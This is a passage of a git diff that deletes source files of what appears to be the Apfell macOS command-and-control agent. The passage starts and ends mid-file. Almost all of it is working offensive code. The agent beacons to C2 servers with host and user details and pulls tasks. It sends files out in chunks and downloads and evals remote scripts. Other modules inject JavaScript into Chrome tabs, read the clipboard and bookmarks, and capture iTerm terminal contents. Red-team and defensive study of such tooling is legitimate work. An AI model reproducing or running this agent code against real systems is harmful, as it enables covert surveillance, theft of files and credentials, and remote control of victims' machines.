this.encrypt_message(agent_id, JSON.stringify(data)).js; - }else if(typeof(sendData) === "string"){ - data = $(uid + sendData).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0); - }else{ - data = $(agent_id + JSON.stringify(data)).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0).js; - } - let base_url = this.get_random_element(endpoint['urls']); - let base_uri = endpoint['uri']; - for(let i in endpoint['urlFunctions']){ - let value = endpoint['urlFunctions'][i]['value']; - if(value === undefined){value = "";} - if(value === "message"){value = data;} - value = this.create_value(value, endpoint['urlFunctions'][i]['transforms']); - base_uri = base_uri.replace(endpoint['urlFunctions'][i]['name'], value); - } - let query_string = "?"; - for(let i in endpoint['QueryParameters']){ - let value = endpoint['QueryParameters'][i]['value']; - if(value === undefined){value = "";} - if(value === "message"){value = data;} - value = this.create_value(value, endpoint['QueryParameters'][i]['transforms']); - let NSCharacterSet = $.NSCharacterSet.characterSetWithCharactersInString("/+=\n").invertedSet; - value = $(value).stringByAddingPercentEncodingWithAllowedCharacters(NSCharacterSet).js; - query_string += endpoint['QueryParameters'][i]['name'] + "=" + value + "&"; - } - base_uri += query_string.slice(0, -1); //take off trailing & or ? - let cookies = {}; - for(let i in endpoint['Cookies']){ - let value = endpoint['Cookies'][i]['value']; - if(value === undefined){ value = "";} - if(value === "message"){ value = data;} - value = this.create_value(value, endpoint['Cookies'][i]['transforms']); - cookies[endpoint['Cookies'][i]['name']] = value; - } - let headers = endpoint['AgentHeaders']; - let cookie_header = ""; - for(let i in cookies){ - cookie_header += i + "=" + cookies[i] + ";"; - } - if(cookie_header !== ""){ - headers['Cookie'] = cookie_header; - } - let url = base_url + base_uri; - let body = this.create_value(data, endpoint['Body']); - // now make the request object - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - for(let i in headers) { - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(headers[i]), $.NSString.alloc.initWithUTF8String(i)); - } - if(method === "POST") { - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("POST")); - let postData = $(body).dataUsingEncodingAllowLossyConversion($.NSString.NSASCIIStringEncoding, true); - let postLength = $.NSString.stringWithFormat("%d", postData.length); - req.addValueForHTTPHeaderField(postLength, $.NSString.alloc.initWithUTF8String('Content-Length')); - req.setHTTPBody(postData); - } - return req; - } - getConfig(){ - //A RESTful base config consists of the following: - // BaseURL (includes Port), CallbackInterval, KillDate (not implemented yet) - let config = { - "C2": { - "commands": this.commands.join(","), - "api_version": this.api_version, - "aes_psk": this.aes_psk, - "config": this.c2_config - }, - "Host": { - "user": apfell.user, - "fullName": apfell.fullName, - "ips": apfell.ip, - "hosts": apfell.host, - "environment": apfell.environment, - "uptime": apfell.uptime, - "args": apfell.args, - "pid": apfell.pid, - "apfell_id": apfell.id, - "payload_id": apfell.uuid - }}; - return JSON.stringify(config, null, 2); - } - checkin(ip, pid, user, host, os, architecture, domain){ - let info = {'ip':ip,'pid':pid,'user':user,'host':host,'uuid':apfell.uuid, "os": os, "architecture": architecture, "domain": domain, 
"action": "checkin"}; - if(user === 'root'){info['integrity_level'] = 3;} - //let req = null; - let jsondata = null; - if(this.exchanging_keys){ - let sessionID = this.negotiate_key(); - jsondata = this.make_request("POST", sessionID, info); - }else{ - jsondata = this.make_request("POST", apfell.uuid, info); - } - apfell.id = jsondata.id; - // if we fail to get an ID number then exit the application - if(apfell.id === undefined){ $.NSApplication.sharedApplication.terminate(this); } - return jsondata; - } - getTasking(){ - while(true){ - try{ - let task = this.make_request("GET", apfell.id, {"tasking_size":1, "action": "get_tasking"}); - return task['tasks']; - } - catch(error){ - //console.log("error in getTasking: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - postResponse(task, data){ - //depending on the amount of data we're sending, we might need to chunk it - data['task_id'] = task.id; - let postData = {"action": "post_response", "responses": [data]}; - return this.make_request("POST", apfell.id, postData ); - } - make_request(method="POST", uid=apfell.id, data=null){ - while(true){ - try{ - let req; - if(method === "POST"){ - if(this.post_messages.length > 0) { - req = this.create_message(this.get_random_element(this.post_messages), data, uid, method); - }else{ - req = this.create_message(this.get_random_element(this.get_messages), data, uid, method); - } - }else{ - if(this.get_messages.length > 0){ - req = this.create_message(this.get_random_element(this.get_messages), data, uid, method); - }else{ - req = this.create_message(this.get_random_element(this.post_messages), data, uid, method); - } - } - //for some reason it sometimes randomly fails to send the data, throwing a JSON error. 
loop to fix for now - let response = Ref(); - let error = Ref(); - let responseData = $.NSURLConnection.sendSynchronousRequestReturningResponseError(req,response,error); - responseData = this.retrieve_message(responseData, method); - if( responseData.length < 36){ - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - //console.log("carving out rest of message"); - if(uuid !== apfell.uuid && uuid !== apfell.id && uuid !== uid){ - //console.log("id doesn't match: " + uuid); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - //we don't need to decrypt it, so we can just parse and return it - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - } - } - catch(error){ - //console.log("error in make_request: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - download(task, params){ - let output = ""; - if( does_file_exist(params)){ - let offset = 0; - let chunkSize = this.chunk_size; //3500; - let full_path = params; - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(params)); - full_path = "/" + pieces.slice(1).join("/"); - var handle = $.NSFileHandle.fileHandleForReadingAtPath(full_path); - // Get the file size by seeking; - var fileSize = handle.seekToEndOfFile; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), "completed": true}; - } - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, "full_path": full_path}; - let registerFile = this.postResponse(task, registerData); - if (registerFile['responses'][0]['status'] === "success"){ - handle.seekToFileOffset(0); - let currentChunk = 1; - let data = handle.readDataOfLength(chunkSize); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js, 'file_id': registerFile['responses'][0]['file_id']}; - let response = this.postResponse(task, fileData); - if(response['responses'][0]['status'] === 'success'){ - offset += parseInt(data.length); - handle.seekToFileOffset(offset); - currentChunk += 1; - data = handle.readDataOfLength(chunkSize); - } - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - } - output = {"completed":true, "file_id": registerFile['responses'][0]['file_id']}; - } - else{ - output = {'status': 'error', 'user_output': "Failed to register file to download", "completed": true}; - } - } - else{ - output = {'status': 'error', 'user_output': "file does not exist", "completed": true}; - } - return output; - } - upload(task, file_id, full_path){ - try{ - let data = {"action": "upload", "file_id": file_id, "chunk_size": this.chunk_size, 
"chunk_num": 1, "full_path": full_path, "task_id": task.id}; - let chunk_num = 1; - let total_chunks = 1; - let total_data = $.NSMutableData.dataWithLength(0); - do{ - let file_data = this.make_request("POST", apfell.id, data); - if(file_data['chunk_num'] === 0){ - return {'status': 'error', 'user_output': "Error from the server", "completed": true}; - } - chunk_num = file_data['chunk_num']; - total_chunks = file_data['total_chunks']; - total_data.appendData($.NSData.alloc.initWithBase64Encoding($(file_data['chunk_data']))); - data = {"action": "upload", "file_id": file_id, "chunk_size": this.chunk_size, "chunk_num": chunk_num + 1, "task_id": task.id}; - }while(chunk_num < total_chunks); - return total_data; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), "completed": true}; - } - } -} -//------------- INSTANTIATE OUR C2 CLASS BELOW HERE IN MAIN CODE----------------------- -ObjC.import('Security'); -C2 = new customC2(); diff --git a/Payload_Types/apfell/agent_code/cat.js b/Payload_Types/apfell/agent_code/cat.js deleted file mode 100755 index 8a352b047..000000000 --- a/Payload_Types/apfell/agent_code/cat.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.cat = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('path')){return {"user_output": "Missing path parameter", "completed": true, "status": "error"}} - let contents = $.NSString.stringWithContentsOfFileEncodingError($(command_params['path']), $.NSUTF8StringEncoding, $()).js; - if(contents === ""){ - return {"user_output": "No output from command", "completed": true}; - } - else if(contents === true){ - return {"user_output": "True", "completed": true}; - } - else if(contents === false){ - return{"user_output": "False", "completed": true}; - } - else if(contents === undefined){ - return {"user_output": "Failed to read file. 
Either you don't have permissions or the file doesn't exist", "completed": true, "status": "error"}; - } - return {"user_output": contents, "completed": true}; - } - catch(error){ - return {"user_output": error.toString(), "status": "error", "completed": true}; - } -}; diff --git a/Payload_Types/apfell/agent_code/cd.js b/Payload_Types/apfell/agent_code/cd.js deleted file mode 100755 index 64197ba7a..000000000 --- a/Payload_Types/apfell/agent_code/cd.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.cd = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('path')){return {"user_output": "Missing path parameter", "completed": true, "status": "error"}} - let fileManager = $.NSFileManager.defaultManager; - let success = fileManager.changeCurrentDirectoryPath(command_params['path']); - if(success){ - return {"user_output": "New cwd: " + fileManager.currentDirectoryPath.js, "completed": true}; - }else{ - return {"user_output": "Failed to change directory", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output": error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/chrome_bookmarks.js b/Payload_Types/apfell/agent_code/chrome_bookmarks.js deleted file mode 100755 index e8649b543..000000000 --- a/Payload_Types/apfell/agent_code/chrome_bookmarks.js +++ /dev/null @@ -1,31 +0,0 @@ -exports.chrome_bookmarks = function(task, command, params){ - let all_data = []; - try{ - let ch = Application("Google Chrome"); - if(ch.running()){ - let folders = ch.bookmarkFolders; - for (let i = 0; i < folders.length; i ++){ - let folder = folders[i]; - let bookmarks = folder.bookmarkItems; - all_data.push("Folder Name: " + folder.title()); - for (let j = 0; j < bookmarks.length; j++){ - let info = "Title: " + bookmarks[j].title() + - "\nURL: " + bookmarks[j].url() + - "\nindex: " + bookmarks[j].index() + - "\nFolder/bookmark: " + i + "/" + j; - all_data.push(info); //populate our array - } - } - } - else{ - return {"user_output": "Chrome is not running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": "error"}; - } - return {"user_output": all_data, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/chrome_js.js b/Payload_Types/apfell/agent_code/chrome_js.js deleted file mode 100755 index d63e33c38..000000000 --- a/Payload_Types/apfell/agent_code/chrome_js.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.chrome_js = function(task, command, params){ - try{ - let split_params = JSON.parse(params); - let window = split_params['window']; - let tab = split_params['tab']; - let jscript = split_params['javascript']; - if(Application("Google Chrome").running()){ - let result = Application("Google Chrome").windows[window].tabs[tab].execute({javascript:jscript}); - if(result !== undefined){ - return {"user_output": String(result), "completed": true}; - } - return {"user_output":"completed", "completed": true}; - }else{ - return {"user_output":"Chrome isn't running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": 
"error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/chrome_tabs.js b/Payload_Types/apfell/agent_code/chrome_tabs.js deleted file mode 100755 index 70b0b5208..000000000 --- a/Payload_Types/apfell/agent_code/chrome_tabs.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.chrome_tabs = function(task, command, params){ - let tabs = {}; - try{ - let ch = Application("Google Chrome"); - if(ch.running()){ - for (let i = 0; i < ch.windows.length; i++){ - let win = ch.windows[i]; - tabs["Window " + i] = {}; - for (let j = 0; j < win.tabs.length; j++){ - let tab = win.tabs[j]; - tabs["Window " + i]["Tab " + j] = {"title": tab.title(), "url": tab.url()}; - } - } - }else{ - return {"user_output": "Chrome is not running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": "error"}; - } - return {"user_output": JSON.stringify(tabs, null, 2), "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/clipboard.js b/Payload_Types/apfell/agent_code/clipboard.js deleted file mode 100755 index 6caf7334d..000000000 --- a/Payload_Types/apfell/agent_code/clipboard.js +++ /dev/null @@ -1,44 +0,0 @@ -exports.clipboard = function(task, command, params){ - ObjC.import('AppKit'); - let parsed_params; - try{ - parsed_params = JSON.parse(params); - }catch(error){ - return {"user_output": "Failed to parse parameters", "status": "error", "completed": true}; - } - if(parsed_params.hasOwnProperty("data") && parsed_params['data'].length > 0){ - // Try setting the clipboard to whatever is in params - try{ - $.NSPasteboard.generalPasteboard.clearContents; - $.NSPasteboard.generalPasteboard.setStringForType($(parsed_params['data']), $.NSPasteboardTypeString); - return {"user_output": "Successfully set the clipboard", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - } - else{ - //try just reading the clipboard data and returning it - if(parsed_params['types'].length === 0){ - parsed_params['types'].push("public.utf8-plain-text"); - } - try{ - let pb = $.NSPasteboard.generalPasteboard; - let types = pb.types.js; - let clipboard = {}; - for(let i = 0; i < types.length; i++){ - let typejs = types[i].js; - clipboard[typejs] = pb.dataForType(types[i]); - if(clipboard[typejs].js !== undefined && (parsed_params['types'].includes(typejs) || parsed_params['types'][0] == "*")){ - clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js; - }else{ - clipboard[typejs] = ""; - } - } - return {"user_output": JSON.stringify(clipboard, null, 4), "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - } -}; diff --git a/Payload_Types/apfell/agent_code/current_user.js b/Payload_Types/apfell/agent_code/current_user.js deleted file mode 100755 index 6980d3c56..000000000 --- a/Payload_Types/apfell/agent_code/current_user.js +++ /dev/null @@ -1,30 +0,0 @@ -exports.current_user = function(task, command, params){ - try{ - let method = "api"; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('method') && data['method'] !== ""){ - method = data['method']; - } - } - if(method === "jxa"){ - let user = Application("System Events").currentUser; - let info = "Name: " + user.name() + - "\nFullName: " + user.fullName() + - 
"\nhomeDirectory: " + user.homeDirectory() + - "\npicturePath: " + user.picturePath(); - return {"user_output":info, "completed": true}; - } - else if(method === "api"){ - let output = "\nUserName: " + $.NSUserName().js + - "\nFull UserName: " + $.NSFullUserName().js + - "\nHome Directory: " + $.NSHomeDirectory().js; - return {"user_output":output, "completed": true}; - } - else{ - return {"user_output":"Method not supported", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/download.js b/Payload_Types/apfell/agent_code/download.js deleted file mode 100755 index cae93ce6c..000000000 --- a/Payload_Types/apfell/agent_code/download.js +++ /dev/null @@ -1,13 +0,0 @@ -exports.download = function(task, command, params){ - try{ - if(params === "" || params === undefined){return {'user_output': "Must supply a path to a file to download", "completed": true, "status": "error"}; } - let status = C2.download(task, params); - if(status.hasOwnProperty("file_id")){ - status['user_output'] = "Finished Downloading"; - } - return status; - }catch(error){ - return {'user_output': error.toString(), "completed": true, "status": "error"}; - } - -}; diff --git a/Payload_Types/apfell/agent_code/exit.js b/Payload_Types/apfell/agent_code/exit.js deleted file mode 100755 index b3fc84813..000000000 --- a/Payload_Types/apfell/agent_code/exit.js +++ /dev/null @@ -1,6 +0,0 @@ -exports.exit = function(task, command, params){ - ObjC.import("AppKit"); - C2.postResponse(task, {"completed": true, "user_output": "Exiting"}); - $.NSApplication.sharedApplication.terminate($.nil); - $.NSThread.exit(); -}; diff --git a/Payload_Types/apfell/agent_code/get_config.js b/Payload_Types/apfell/agent_code/get_config.js deleted file mode 100755 index 5c6e6dc9f..000000000 --- a/Payload_Types/apfell/agent_code/get_config.js +++ /dev/null @@ -1,4 +0,0 @@ -exports.get_config = function(task, command, params){ - let config = C2.getConfig(); - return {"user_output":config, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/hostname.js b/Payload_Types/apfell/agent_code/hostname.js deleted file mode 100644 index 03b59aafd..000000000 --- a/Payload_Types/apfell/agent_code/hostname.js +++ /dev/null @@ -1,16 +0,0 @@ -exports.hostname = function(task, command, params){ - let output = {}; - output['localized'] = ObjC.deepUnwrap($.NSHost.currentHost.localizedName); - output['names'] = ObjC.deepUnwrap($.NSHost.currentHost.names); - let fileManager = $.NSFileManager.defaultManager; - if(fileManager.fileExistsAtPath("/Library/Preferences/SystemConfiguration/com.apple.smb.server.plist")){ - let dict = $.NSMutableDictionary.alloc.initWithContentsOfFile("/Library/Preferences/SystemConfiguration/com.apple.smb.server.plist"); - let contents = ObjC.deepUnwrap(dict); - output['Local Kerberos Realm'] = contents['LocalKerberosRealm']; - output['NETBIOS Name'] = contents['NetBIOSName']; - output['Server Description'] = contents['ServerDescription']; - } - return {"user_output": JSON.stringify(output, null, 2), "completed": true}; -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/iTerm.js b/Payload_Types/apfell/agent_code/iTerm.js deleted file mode 100755 index a1280510a..000000000 --- a/Payload_Types/apfell/agent_code/iTerm.js +++ /dev/null @@ -1,29 +0,0 @@ -exports.iTerm = function(task, command, params){ - try{ - let term = Application("iTerm"); - if(!term.running()){ - 
term = Application("iTerm2"); // it might be iTerm2 instead of iTerm in some instances, try both - } - let output = {}; - if(term.running()){ - for(let i = 0; i < term.windows.length; i++){ - let window = {}; - for(let j = 0; j < term.windows[i].tabs.length; j++){ - let tab_info = {}; - tab_info['tty'] = term.windows[i].tabs[j].currentSession.tty(); - tab_info['name'] = term.windows[i].tabs[j].currentSession.name(); - tab_info['contents'] = term.windows[i].tabs[j].currentSession.contents(); - tab_info['profileName'] = term.windows[i].tabs[j].currentSession.profileName(); - window["Tab: " + j] = tab_info; - } - output["Window: " + i] = window; - } - return {"user_output":JSON.stringify(output, null, 2), "completed": true}; - } - else{ - return {"user_output":"iTerm isn't running", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/ifconfig.js b/Payload_Types/apfell/agent_code/ifconfig.js deleted file mode 100644 index 2516ed9e4..000000000 --- a/Payload_Types/apfell/agent_code/ifconfig.js +++ /dev/null @@ -1,4 +0,0 @@ -exports.ifconfig = function(task, command, params){ - return {"user_output": JSON.stringify(ObjC.deepUnwrap($.NSHost.currentHost.addresses), null, 2), "completed": true}; -}; - diff --git a/Payload_Types/apfell/agent_code/jscript.js b/Payload_Types/apfell/agent_code/jscript.js deleted file mode 100755 index ec16398ce..000000000 --- a/Payload_Types/apfell/agent_code/jscript.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.jscript = function(task, command, params){ - //simply eval a javascript string and return the response - let response = ""; - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty("command")){ return {"user_output": "Missing command parameter", "status": "error", "completed": true};} - response = ObjC.deepUnwrap(eval(command_params['command'])); - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - if(response === undefined || response === ""){ - response = "No Command Output"; - } - if(response === true){ - response = "True"; - } - if(response === false){ - response = "False"; - } - if(typeof(response) != "string"){ - response = String(response); - } - return {"user_output":response, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/jsimport.js b/Payload_Types/apfell/agent_code/jsimport.js deleted file mode 100755 index 73289fdf4..000000000 --- a/Payload_Types/apfell/agent_code/jsimport.js +++ /dev/null @@ -1,21 +0,0 @@ -exports.jsimport = function(task,command,params){ - let script = ""; - try{ - let config = JSON.parse(params); - if(config.hasOwnProperty("file")){ - let script_data = C2.upload(task, config['file']); - if(typeof script_data === "string"){ - return{"user_output":"Failed to get contents of file", "completed": true, "status": "error"}; - } - script = ObjC.unwrap($.NSString.alloc.initWithDataEncoding(script_data, $.NSUTF8StringEncoding)); - } - else{ - return {"user_output":"Need to supply a valid file to download", "completed": true, "status": "error"}; - } - jsimport = script; - return {"user_output":"Imported the script", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/jsimport_call.js b/Payload_Types/apfell/agent_code/jsimport_call.js deleted file mode 100755 index 
c7c6efe82..000000000 --- a/Payload_Types/apfell/agent_code/jsimport_call.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.jsimport_call = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('command')){ return {"user_output": "missing command parameter", "status": "error", "completed": true};} - let output = ObjC.deepUnwrap(eval(jsimport + "\n " + command_params['command'])); - if(output === "" || output === undefined){ - return {"user_output":"No command output", "completed": true}; - } - if(output === true){ - return {"user_output":"True", "completed": true}; - } - if(output === false){ - return{"user_output":"False", "completed": true}; - } - if(typeof(output) != "string"){ - output = String(output); - } - return {"user_output":output, "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/launchapp.js b/Payload_Types/apfell/agent_code/launchapp.js deleted file mode 100755 index c83ce5729..000000000 --- a/Payload_Types/apfell/agent_code/launchapp.js +++ /dev/null @@ -1,20 +0,0 @@ -exports.launchapp = function(task, command, params){ - //this should be the bundle identifier like com.apple.itunes to launch - //it will launch hidden, asynchronously, and will be 'hidden' (still shows up in the dock though) - let response = ""; - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('bundle')){ return {"user_output": "missing bundle identifier", "completed": true, "status": "error"}} - ObjC.import('AppKit'); - $.NSWorkspace.sharedWorkspace.launchAppWithBundleIdentifierOptionsAdditionalEventParamDescriptorLaunchIdentifier( - command_params['bundle'], - $.NSWorkspaceLaunchAsync | $.NSWorkspaceLaunchAndHide | $.NSWorkspaceLaunchWithoutAddingToRecents, - $.NSAppleEventDescriptor.nullDescriptor, - null - ); - return {"user_output":"Program launched", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/list_apps.js b/Payload_Types/apfell/agent_code/list_apps.js deleted file mode 100755 index b4eef5a80..000000000 --- a/Payload_Types/apfell/agent_code/list_apps.js +++ /dev/null @@ -1,33 +0,0 @@ -exports.list_apps = function(task, command, params){ - ObjC.import('AppKit'); - try{ - let names = []; - let procs = $.NSWorkspace.sharedWorkspace.runningApplications.js; - for(let i = 0; i < procs.length; i++){ - let info = {}; - info['frontMost'] = procs[i].active; - info['hidden'] = procs[i].hidden; - info['bundle'] = procs[i].bundleIdentifier.js; - info['bundleURL'] = procs[i].bundleURL.path.js; - info['bin_path'] = procs[i].executableURL.path.js; - info['process_id'] = procs[i].processIdentifier; - info['name'] = procs[i].localizedName.js; - if(procs[i].executableArchitecture === "16777223"){ - info['architecture'] = "x64"; - } - else if(procs[i].executableArchitecture === "7"){ - info['architecture'] = "x86"; - } - else if(procs[i].executableArchitecture === "18"){ - info['architecture'] = "x86_PPC"; - } - else if(procs[i].executableArchitecture === "16777234"){ - info['architecture'] = "x86_64_PPC"; - } - names.push(info); - } - return {"user_output":JSON.stringify(names, null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/list_users.js 
b/Payload_Types/apfell/agent_code/list_users.js deleted file mode 100755 index 7ed611916..000000000 --- a/Payload_Types/apfell/agent_code/list_users.js +++ /dev/null @@ -1,99 +0,0 @@ -exports.list_users = function(task, command, params){ - let all_users = []; - let gid = -1; - let groups = false; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('gid') && data['gid'] !== "" && data['gid'] > 0){ - gid = data['gid']; - } - if(data.hasOwnProperty("groups") && data['groups'] !== ""){ - groups = data['groups']; - } - } - ObjC.import('Collaboration'); - ObjC.import('CoreServices'); - if(gid < 0){ - let defaultAuthority = $.CSGetLocalIdentityAuthority(); - let identityClass = 2; - if(groups){ - all_users = []; // we will want to do a dictionary so we can group the members by their GID - } - else{ - identityClass = 1; //enumerate users - } - let query = $.CSIdentityQueryCreate($(), identityClass, defaultAuthority); - let error = Ref(); - $.CSIdentityQueryExecute(query, 0, error); - let results = $.CSIdentityQueryCopyResults(query); - let numResults = parseInt($.CFArrayGetCount(results)); - if(results.js === undefined){ - results = $.CFMakeCollectable(results); - } - for(let i = 0; i < numResults; i++){ - let identity = results.objectAtIndex(i);//results[i]; - let idObj = $.CBIdentity.identityWithCSIdentity(identity); - if(groups){ - //if we're looking at groups, then we have a different info to print out - all_users[i] = {}; - all_users[i]["POSIXID"] = idObj.posixGID; - all_users[i]['aliases'] = ObjC.deepUnwrap(idObj.aliases); - all_users[i]['fullName'] = ObjC.deepUnwrap(idObj.fullName); - all_users[i]['POSIXName'] = ObjC.deepUnwrap(idObj.posixName); - all_users[i]['members'] = []; - let members = idObj.memberIdentities.js; - for(let j = 0; j < members.length; j++){ - let info = { - "POSIXName": members[j].posixName.js, - "POSIXID": members[j].posixUID, - "LocalAuthority": members[j].authority.localizedName.js, - "FullName": members[j].fullName.js, - "Emails": members[j].emailAddress.js, - "isHiddenAccount": members[j].isHidden, - "Enabled": members[j].isEnabled, - "Aliases": ObjC.deepUnwrap(members[j].aliases), - "UUID": members[j].UUIDString.js - }; - all_users[i]['members'].push(info); - } - } - else{ - let info = { - "POSIXName": idObj.posixName.js, - "POSIXID": idObj.posixUID, - "LocalAuthority": idObj.authority.localizedName.js, - "FullName": idObj.fullName.js, - "Emails": idObj.emailAddress.js, - "isHiddenAccount": idObj.isHidden, - "Enabled": idObj.isEnabled, - "Aliases": ObjC.deepUnwrap(idObj.aliases), - "UUID": idObj.UUIDString.js - }; - all_users.push(info); - } - } - } - else{ - let defaultAuthority = $.CBIdentityAuthority.defaultIdentityAuthority; - let group = $.CBGroupIdentity.groupIdentityWithPosixGIDAuthority(gid, defaultAuthority); - let results = group.memberIdentities.js; - let numResults = results.length; - for(let i = 0; i < numResults; i++){ - let idObj = results[i]; - let info = { - "POSIXName": idObj.posixName.js, - "POSIXID": idObj.posixUID, - "LocalAuthority": idObj.authority.localizedName.js, - "FullName": idObj.fullName.js, - "Emails": idObj.emailAddress.js, - "isHiddenAccount": idObj.isHidden, - "Enabled": idObj.isEnabled, - "Aliases": ObjC.deepUnwrap(idObj.aliases), - "UUID": idObj.UUIDString.js - }; - all_users.push(info); - } - } - return {"user_output":JSON.stringify(all_users, null, 2), "completed": true}; -}; - diff --git a/Payload_Types/apfell/agent_code/load.js b/Payload_Types/apfell/agent_code/load.js deleted file mode 100755 
index 61e9b848b..000000000 --- a/Payload_Types/apfell/agent_code/load.js +++ /dev/null @@ -1,26 +0,0 @@ -exports.load = function(task, command, params){ - //base64 decode the params and pass it to the default_load command - // params should be {"cmds": "cmd1 cmd2 cmd3", "file_id": #} - try{ - let parsed_params = JSON.parse(params); - let code = C2.upload(task, parsed_params['file_id'], ""); - if(typeof code === "string"){ - return {"user_output":String(code), "completed": true, "status": "error"}; - //something failed, we should have NSData type back - } - let new_dict = default_load(base64_decode(code)); - commands_dict = Object.assign({}, commands_dict, new_dict); - // update the config with our new information - C2.commands = Object.keys(commands_dict); - let cmds = parsed_params['cmds'].split(" ") - let cmd_list = []; - for(let i = 0; i < cmds.length; i++){ - cmd_list.push({"action": "add", "cmd": cmds[i]}) - } - return {"user_output": "Loaded " + parsed_params['cmds'], "commands": cmd_list, "completed": true}; - } - catch(error){ - //console.log("errored in load function"); - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/ls.js b/Payload_Types/apfell/agent_code/ls.js deleted file mode 100755 index 4b1c6e9cf..000000000 --- a/Payload_Types/apfell/agent_code/ls.js +++ /dev/null @@ -1,123 +0,0 @@ -exports.ls = function(task, command, params){ - ObjC.import('Foundation'); - let output = {}; - try { - let command_params = JSON.parse(params); - let fileManager = $.NSFileManager.defaultManager; - let error = Ref(); - let path = command_params['path']; - if (path === "" || path === ".") { - path = fileManager.currentDirectoryPath.js; - if (path === undefined || path === "") { - return { - "user_output": "Failed to get current working directory", - "completed": true, - "status": "error" - }; - } - } - if (path[0] === '"') { - path = path.substring(1, path.length - 1); - } - if(path[0] === '~'){ - path = $(path).stringByExpandingTildeInPath.js; - } - output['host'] = ObjC.unwrap(apfell.procInfo.hostName); - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(path), error)); - if (attributes !== undefined) { - output['is_file'] = true; - output['files'] = []; - if (attributes.hasOwnProperty('NSFileType') && attributes['NSFileType'] === "NSFileTypeDirectory") { - let error = Ref(); - output['is_file'] = false; - let files = 